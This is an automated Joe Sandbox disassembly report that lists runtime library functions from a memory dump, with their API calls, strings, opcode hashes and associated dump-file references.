Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 070c2b1651ddda1201c17ab1123327ad399f223739103d6d8cc334ea5e9b9043
Instruction ID: 462dcfcbe4991a40e8019b343f94687544161f610f14df613355be3eb38be9b8
Opcode Fuzzy Hash: 070c2b1651ddda1201c17ab1123327ad399f223739103d6d8cc334ea5e9b9043
Instruction Fuzzy Hash: 6C017131601264BAEF21BB754C4EBFE3798AF0A781F044459F902E7091DB6CCA8186B6

Function 007DB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 007DB8B8

Strings

, xrefs: 007DB8FD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: a067c40a48fbbc76ddd8918717bbc8fb6badc3dce2e46fbbc0ca2924bc5ac3ae
Instruction ID: ce5e2732f3c07691f697103b75b41319bbb4c4b8cc5e2ab7bded6efe4cd8054a
Opcode Fuzzy Hash: a067c40a48fbbc76ddd8918717bbc8fb6badc3dce2e46fbbc0ca2924bc5ac3ae
Instruction Fuzzy Hash: 7141F97050438CDADB218E648C94BEABBB9EB55304F1404EED5DA96242D339AA45DB60

Function 007DAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 007DAFDD

Strings

LCMapStringEx, xrefs: 007DAF7D, 007DAF87

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: e7a95c136849eda713d23990fa9ec23d60fbce7657fdf21a156db67b59a8fd4c
Instruction ID: d22ad8a3a4a2d11d2a1065227f4833bdcc91baba2c2240e5b3b76f24c3a3d1b2
Opcode Fuzzy Hash: e7a95c136849eda713d23990fa9ec23d60fbce7657fdf21a156db67b59a8fd4c
Instruction Fuzzy Hash: A0015372101209BBCF029F90DC06DAE7F62FF0C310F008155FE0826260CA3A9A31EB81

Function 007DAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,007DA56F), ref: 007DAF55

Strings

InitializeCriticalSectionEx, xrefs: 007DAF1B, 007DAF25

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: f9c92582eac56763f434c8d25fed227f11bd5853f760fa25327fc8d096784122
Instruction ID: 8bdedeededbcffc0cc674dd1c39bda92085d6ce460077b8323477725bb933330
Opcode Fuzzy Hash: f9c92582eac56763f434c8d25fed227f11bd5853f760fa25327fc8d096784122
Instruction Fuzzy Hash: 15F0B471646248BBCF155F51DC06DAD7F61EF08711B008059FD185A260DA799E10D799

Function 007DADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 007DADEE

Strings

FlsAlloc, xrefs: 007DADC0, 007DADCA

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 7518040ba1fcad22d89aefdcc59f8c4aff5a5118bcc22545ddc2a5a9d6169181
Instruction ID: 30fb5acfd31df11b950ac153250ddcbb92a3e44b5615b79ec1a8a909f74b9bc3
Opcode Fuzzy Hash: 7518040ba1fcad22d89aefdcc59f8c4aff5a5118bcc22545ddc2a5a9d6169181
Instruction Fuzzy Hash: 64E05570742248BBC304AB26DC0BD2EBB65EF0C721B00009AFC049B340DE3C6E0082DA

Function 007CE1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 084c8bdbfe63cada1d5bf88f9280599c52708a427dad6be89d429c80f0a27d17
Instruction ID: c58a8a0984f3937397bfff059cd2f961f16c3dcb1a857fea6ca360fda0af7890
Opcode Fuzzy Hash: 084c8bdbfe63cada1d5bf88f9280599c52708a427dad6be89d429c80f0a27d17
Instruction Fuzzy Hash: DEB012D525A040FE310552461C06E37134CC6C6B10330C13EFC06C0180D848BE590831

Function 007CE1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: ff4fb6b0d5a8cec6852f9ca97ed29ac68c91597ef7ddc4567d6140f1e4298bb2
Instruction ID: 82f0400aabbade439e559d623180aa022de9b387f469149b456116f046714ee1
Opcode Fuzzy Hash: ff4fb6b0d5a8cec6852f9ca97ed29ac68c91597ef7ddc4567d6140f1e4298bb2
Instruction Fuzzy Hash: 7FB012D925E144FD3106518A2C06E37135CD5C4B10330403EF805C0080D8887F550931

Function 007CE1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 6393e4775b03e5b23b2440f58d350d0fc2170718620ac59d1f86c3fbabac8c2c
Instruction ID: 643fc4effe58f6ee678a70dcb5755f47263b92632103f93d665600b6966e4852
Opcode Fuzzy Hash: 6393e4775b03e5b23b2440f58d350d0fc2170718620ac59d1f86c3fbabac8c2c
Instruction Fuzzy Hash: F3B012D925A140FD310611862C06D37130CC5C5B10330843EFC01C0480D888BF550831

Function 007CE26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: e5afff873ce1bddcec3cfd6e83b5740880b132b1dac7748c53d55219e93af768
Instruction ID: cb60cbc1eae6e322b4c7078d098856e3ebc00a4c8baa2e37b7443f921ad1e822
Opcode Fuzzy Hash: e5afff873ce1bddcec3cfd6e83b5740880b132b1dac7748c53d55219e93af768
Instruction Fuzzy Hash: 17B012D525A040FD310551961C06E37138CC5C5B10330803EFD09C0080E848BE550831

Function 007CE264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 5549ff4909126f567bdfcf286eafdbced30995a5e33453844639d29f601d38f6
Instruction ID: fb68fe960976766b70f0eaa71f845465d24a5bf48766348664420f810978e723
Opcode Fuzzy Hash: 5549ff4909126f567bdfcf286eafdbced30995a5e33453844639d29f601d38f6
Instruction Fuzzy Hash: 52B012D526B080FD310551461C06E37138DD9C4B20330403EF806C0080D848BE950831

Function 007CE250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 9cbde7b3a2104278f0c10e763610e7089fb0ec656d563c44c8204071dec2a057
Instruction ID: a3847f3079b976568a2fe7344793fa1c02efd3767a88265f80cc3351f5b6d79c
Opcode Fuzzy Hash: 9cbde7b3a2104278f0c10e763610e7089fb0ec656d563c44c8204071dec2a057
Instruction Fuzzy Hash: A4B012E525B180FD314552461C06E37134DC5C4B20330413EFC05C0080D848BED90831

Function 007CE246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 2c6751348b4f7c5dc239eb744cd8b10772e3806c6ab753a5573ff01d27547b9b
Instruction ID: 7302237913b3dea9fe95fb471de270ca9a354c835fe4bc4109d8d93d3c7f6b8d
Opcode Fuzzy Hash: 2c6751348b4f7c5dc239eb744cd8b10772e3806c6ab753a5573ff01d27547b9b
Instruction Fuzzy Hash: 00B012D525B080FD310551471C06E37134DC5C5B20330803EFC05C0080D848FE950831

Function 007CE23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: b1f280d6dd4ad95f85aea3b4c0a06fd94419b04de04667ac623cab25232f747a
Instruction ID: b4d1b38222efeb0e1ea76a79a329ad57ad725a2f87eddbd17310aa67496b2fdd
Opcode Fuzzy Hash: b1f280d6dd4ad95f85aea3b4c0a06fd94419b04de04667ac623cab25232f747a
Instruction Fuzzy Hash: 7AB012E525A040FD310551471C06E37134CD5C4F10330403EF805C0080D8487F550831

Function 007CE232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 0d848a1f8db1fe5f293cbcd7834e28c72783bfd69f74500b8933bd9e3d8ae824
Instruction ID: 50978f3c4e47c7809b6c2088f2ed4b8d30865c7de043fd89d5fac59cb80a9f02
Opcode Fuzzy Hash: 0d848a1f8db1fe5f293cbcd7834e28c72783bfd69f74500b8933bd9e3d8ae824
Instruction Fuzzy Hash: 69B012E529A040FD310551461D06E37134CC5C4F10330403EF805C0080DC487F560831

Function 007CE228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 016aba5251eb7e427b29aaa1dc43e8dd1ba15b2454f76aecb01f70ade7c919b8
Instruction ID: ad2e59f5373dab3b340a8b45aa60b10e5558ddba5164d229e392a510d9d4ed2a
Opcode Fuzzy Hash: 016aba5251eb7e427b29aaa1dc43e8dd1ba15b2454f76aecb01f70ade7c919b8
Instruction Fuzzy Hash: 32B012E525A140FD314551461C06E37134CC5C4F10330413EFC05C0080D8487F950831

Function 007CE21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 4c304cf5e9d05b30e93e3623ea9a616ebacbc9bf0784b2db6b43192d3df5e8ed
Instruction ID: 8b8bcdfe572d9b71eb9b45a0d0213a7db5238dfa6b7a3709d729ef03210a9a50
Opcode Fuzzy Hash: 4c304cf5e9d05b30e93e3623ea9a616ebacbc9bf0784b2db6b43192d3df5e8ed
Instruction Fuzzy Hash: D4B012E525A040FD310551461C06E37138CC5C5F10330803EFC05C0080D848BF550831

Function 007CE20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD, 007CE20A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: f930329c7968d499fbdf4e7e1ea2e135c6adafbe0890419404434666658126bf
Instruction ID: 6f0f6dd31b9b9fbc508836c964cb0183756d7e62f7284ff810349ae20bb2727a
Opcode Fuzzy Hash: f930329c7968d499fbdf4e7e1ea2e135c6adafbe0890419404434666658126bf
Instruction Fuzzy Hash: E8B012D539A040FE310552461D06E37134CC6C5B10330803EF806C0180DC587F5E0831

Function 007CE200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

